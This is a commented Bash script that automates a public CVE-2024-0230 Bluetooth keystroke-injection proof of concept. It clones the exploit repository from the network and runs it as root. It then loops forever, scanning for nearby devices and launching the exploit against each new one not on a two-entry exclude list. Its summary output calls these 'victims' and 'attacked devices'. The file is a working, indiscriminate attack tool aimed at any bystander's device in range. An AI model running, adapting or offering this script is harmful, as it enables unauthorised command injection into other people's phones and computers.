poc.sh
#!/bin/bash
#------------------------------------------------
# Helper around the public CVE-2024-0230 PoC (marcnewlin/hi_my_name_is_keyboard).
#
# Flow, top to bottom:
#   1. refuse to run unless root and Bash >= 4 (associative arrays);
#   2. apt-get install any required Debian package that is missing;
#   3. check that rfkill/hcitool/hciconfig exist at the hard-coded paths;
#   4. git-clone the PoC repository into the current directory and cd into it;
#   5. start the bluetooth service, rfkill-unblock bluetooth, bring HCI devices up;
#   6. loop forever (see SCAN AND EXPLOIT below): "hcitool scan", remember new
#      MACs, run the cloned PoC against the most recently parsed device unless
#      it is excluded or already in victims_list. Ctrl-C ends the run and the
#      EXIT trap prints a summary.
#
# Host state changed by this script that the EXIT trap does NOT revert:
# installed packages, the cloned checkout, "rfkill unblock bluetooth" and
# "hciconfig <hciX> up". Only the bluetooth service is stopped again, and only
# when this script started it (STOP_BLUETOOTH).
# There is no "set -e/-u/-o pipefail"; a failing command is only fatal where
# the script checks for it explicitly.
#------------------------------------------------
clear
#set -x
#------------------------------------------------
# Banner for the 1337'ishness
#------------------------------------------------
cat << "EOF"
HELPER SCRIPT FOR TESTING THE
BLUETOOTH POC CVE-2024-0230
EOF
#------------------------------------------------
# Variables
#------------------------------------------------
# Absolute tool paths; they are checked for -x below, there is no $PATH fallback.
RFKILL="/usr/sbin/rfkill"
HCITOOL="/usr/bin/hcitool"
HCICONFIG="/usr/bin/hciconfig"
#------------------------------------------------
# Arrays
#------------------------------------------------
# All three are keyed by MAC address exactly as "hcitool scan" prints it
# (17 chars, upper-case hex and ':'); lookups are exact string matches.
declare -A mac_list # Found MAC addresses and their associated data (the rest of the scan line)
declare -A exclude_list # Exclude MAC addresses (value 1 = excluded)
declare -A victims_list # List of victims we have attacked (value 1 = PoC already run this session)
#------------------------------------------------
# Exclude list of MAC's NOT to attack
#------------------------------------------------
exclude_list["58:1C:F8:09:9A:F2"]=1 # Illuminati-PC
exclude_list["78:64:C0:1E:FA:42"]=1 # Illuminati-4G
#------------------------------------------------
# PRE
#------------------------------------------------
# Only run as user root
# (apt-get, systemctl, rfkill and hciconfig below presumably need it; the PoC
# cloned later is therefore also executed as root)
if [ ${UID} -ne 0 ]; then
  printf "\n### ERROR - This script must run as user root (or with sudo)\n\n"
  exit 1
fi
# Ensure script is run with a bash version that supports associative arrays
# (${BASH_VERSINFO} without an index is element 0, the major version)
if [[ "${BASH_VERSINFO:-0}" -lt 4 ]]; then
  echo "Bash version 4.0 or later is required."
  exit 1
fi
# Install needed utils
# A package counts as installed when "dpkg -l" lists it with status "ii".
for PACKET in python3-bluez python3-pydbus rfkill bluez git; do
  if [ $(dpkg -l ${PACKET} 2>/dev/null | grep -c "^ii ${PACKET}") -eq 0 ]; then
    printf "%-50s" "Installing ${PACKET}"
    # The "&" backgrounds "apt-get update", so the install does not wait for
    # the index refresh; both commands are silenced and only the dpkg re-check
    # below decides whether the step succeeded.
    apt-get update -qq -y > /dev/null 2>&1 & apt-get install -y -qq ${PACKET} > /dev/null 2>&1
    if [ $(dpkg -l ${PACKET} 2>/dev/null | grep -c "^ii ${PACKET}") -eq 0 ]; then
      echo "[FAILED]"
      printf "\nInstallation of ${PACKET} failed!\n\n"
      exit 1
    else
      echo "[OK]"
    fi
  fi
done
# Check if utilities exist
# (only executability of the hard-coded paths is tested, not version or behaviour)
for UTIL in ${HCITOOL} ${HCICONFIG} ${RFKILL}; do
  if [ ! -x ${UTIL} ]; then
    printf "\n### ERROR - Could not find ${UTIL}\n\n"
    exit 1
  fi
done
#------------------------------------------------
# Download POC scripts
#------------------------------------------------
# Supply-chain note: the clone is over HTTPS with no pinned commit/tag and no
# integrity check, and the main loop later executes a script from this
# checkout as root, so whatever is at the tip of the remote at run time is
# what runs. "[OK]" is printed even if the clone failed, and the cd below has
# no error check, so a failed clone only surfaces when the PoC is started.
if [ ! -d hi_my_name_is_keyboard ]; then
  printf "%-50s" "Git-Cloning /marcnewlin/hi_my_name_is_keyboard"
  git clone -q https://github.com/marcnewlin/hi_my_name_is_keyboard
  echo "[OK]"
fi
cd hi_my_name_is_keyboard
#------------------------------------------------
# TRAP
#------------------------------------------------
# Runs on every exit (normal, Ctrl-C, "exit 1" above and below). The body is
# single-quoted, so $(date), STOP_BLUETOOTH and mac_list are expanded at exit
# time. It stops the bluetooth service only when this script started it, then
# lists every MAC in mac_list. NOTE: the heading says "Attacked Devices" but
# mac_list holds every device the scan returned; the devices the PoC was
# actually run against are tracked separately in victims_list.
trap '
printf -- "\n--------------------------------------------------------------------------------------\n"
printf "$(date) - Attack stopped\n"
printf -- "--------------------------------------------------------------------------------------\n"
if [ ${STOP_BLUETOOTH:-0} -ne 0 ]; then
systemctl stop bluetooth > /dev/null 2>&1
fi
if [ ${#mac_list[@]} -ne 0 ]; then
printf "\nSummary of Attacked Devices:\n"
printf -- "--------------------------------------------------------------------------------------\n"
for mac in "${!mac_list[@]}"; do
echo "MAC: $mac Data: ${mac_list[$mac]}"
done
printf -- "--------------------------------------------------------------------------------------\n"
fi
' exit
#------------------------------------------------
# MAIN
#------------------------------------------------
# Start bluetooth service
# STOP_BLUETOOTH=1 records that this script (not the system) started the
# service, so the EXIT trap knows to stop it again.
if [ $(systemctl is-active bluetooth|grep -c ^active) -eq 0 ]; then
  printf "%-50s" "Startng bluetooth service"
  STOP_BLUETOOTH=1
  systemctl start bluetooth > /dev/null 2>&1
  if [ $(systemctl is-active bluetooth|grep -c ^active) -eq 0 ]; then
    echo "[FAILED]"
    exit 1
  fi
  echo "[OK]"
fi
#------------------------------------------------
# Rfkill Unblock bluetoooth
#------------------------------------------------
# Counts "blocked" tokens in the SOFT and HARD columns of "rfkill list
# bluetooth". The unblock result is discarded and "[OK]" is printed
# unconditionally; a hard (hardware-switch) block cannot be cleared this way.
# The unblock is not reverted at exit.
if [ $(${RFKILL} --noheadings -o SOFT,HARD list bluetooth|tr ' ' '\n'|grep -v ^$|grep -c ^blocked) -ne 0 ]; then
  printf "%-50s" "Running \"rfkill unblock bluetooth\""
  ${RFKILL} unblock bluetooth > /dev/null 2>&1
  echo "[OK]"
fi
sleep 1
#------------------------------------------------
# Ensure HCI device is up (on)
#------------------------------------------------
# One "hciconfig <hciX> up" per adapter listed by hciconfig (lines starting
# with "hci", name taken up to the first ':'). "activated" counts adapters
# that were attempted, not adapters that actually came up: the result of
# "hciconfig up" is silenced and not checked. Adapters are not brought down
# again at exit.
activated=0
for HCI in $(${HCICONFIG}|grep ^hci|cut -d ':' -f1|awk '{print $1}'); do
  ${HCICONFIG} ${HCI} up > /dev/null 2>&1
  ((activated++))
done
if [ ${activated:-0} -eq 0 ]; then
  printf "### An error occoured - HCI device not responding\n\n"
  exit 1
fi
#------------------------------------------------
# FUNCTIONS
#------------------------------------------------
is_this_a_known_mac() {
  # Returns 0 (true) when the MAC address in $1 is already a key of the
  # global associative array mac_list with a non-empty value, i.e. it was
  # recorded by an earlier scan; returns 1 otherwise. The lookup is an exact,
  # case-sensitive string match on the key.
  local candidate="$1"
  if [[ -z "${mac_list[${candidate}]}" ]]; then
    return 1
  fi
  return 0
}
#------------------------------------------------
# SCAN AND EXPLOIT
#------------------------------------------------
# Endless scan/attack loop; it never terminates on its own. Ctrl-C (or any
# other exit) hands control to the EXIT trap defined above, which prints the
# summary of everything in mac_list.
echo ""
printf -- "--------------------------------------------------------------------------------------\n"
printf "$(date) - Starting attack\n" # the date output is used as the printf format string
printf -- "--------------------------------------------------------------------------------------\n"
attacked=0 # number of PoC invocations; incremented once per HCI adapter per target
# Status line; it is re-printed (with a leading newline) whenever the attack
# branch is taken and again after every PoC run.
printf "%-50s %10s uniq, %s new %s attacked" "$(date) - Device(s) found:" "0" "0" "0"
while true; do
  # One Bluetooth inquiry. "hcitool scan" prints a "Scanning ..." header that
  # is dropped; the remaining lines are "<MAC><whitespace><rest of line>".
  scanning_data=$(${HCITOOL} scan | grep -v ^Scanning) # Perform the scan and filter out the header line
  new_macs_found=0
  while IFS= read -r line; do # Process each found MAC address and format it
    # Rewrite "  AA:BB:CC:DD:EE:FF  Name" as "AA:BB:CC:DD:EE:FF,Name". The MAC
    # must be exactly 17 chars of upper-case hex and ':'; lines that do not
    # match pass through unchanged and are then split on ',' anyway, which
    # normally leaves $data empty so they are skipped below.
    formatted_line=$(echo "$line" | sed -E 's/^[[:space:]]*([0-9A-F:]{17})[[:space:]]*(.*)$/\1,\2/')
    mac=$(echo "$formatted_line" | awk -F, '{print $1}') # text before the first ','
    data=$(echo "$formatted_line" | awk -F, '{print $2}') # text between the first and second ','
    # Keep only lines that yielded both a MAC and some data; a MAC not yet in
    # mac_list is stored and flags that a new device was seen.
    if [[ -n "$mac" && -n "$data" ]]; then
      if ! is_this_a_known_mac "$mac"; then
        mac_list["$mac"]="$data"
        ((new_macs_found++))
        NEW=1 # sticky: not reset here, only cleared below when the attack branch is taken
      fi
    fi
  done <<< "$scanning_data"
  #------------------------------------------------
  # NOTE: $mac and $data still hold the values from the LAST line of the read
  # loop above; the exclusion/victims checks and the attack below all use that
  # single pair.
  if [ ${#mac_list[@]} -ne 0 ] && [ ${NEW:-0} -eq 1 ]; then
    # Skip MACs on the hard-coded exclude list or already attacked this session.
    if [ ! -n "${exclude_list[$mac]}" ] && [ ! -n "${victims_list[$mac]}" ] ; then
      NEW=0
      printf "\n%-50s %10s uniq, %s new %s attacked" "$(date) - Device(s) found:" "${#mac_list[@]}" "${new_macs_found}" "${attacked}"
      #------------------------------------------------
      # Attack
      #------------------------------------------------
      # Runs the PoC from the cloned checkout (current directory, as root)
      # once per HCI adapter, capped at 30 s by "timeout". Its exit status is
      # not checked and the MAC is added to victims_list regardless of outcome.
      for HCI in $(${HCICONFIG}|grep ^hci|cut -d ':' -f1|awk '{print $1}'); do
        printf "\n\n%-50s\n" "Attacking ${mac} | ${data}"
        ((attacked++))
        printf -- "--------------------------------------------------------------------------------------\n"
        timeout 30 ./keystroke-injection-android-linux.py -i ${HCI} -t ${mac}
        victims_list["${mac}"]=1 # Add the target to the victims list so we do not attack them more than 1 time.
        printf "\n"
        printf "%-50s %10s uniq, %s new %s attacked" "$(date) - Device(s) found:" "${#mac_list[@]}" "0" "${attacked}"
      done
    fi
  fi
done
#------------------------------------------------
# END OF SCRIPT
#------------------------------------------------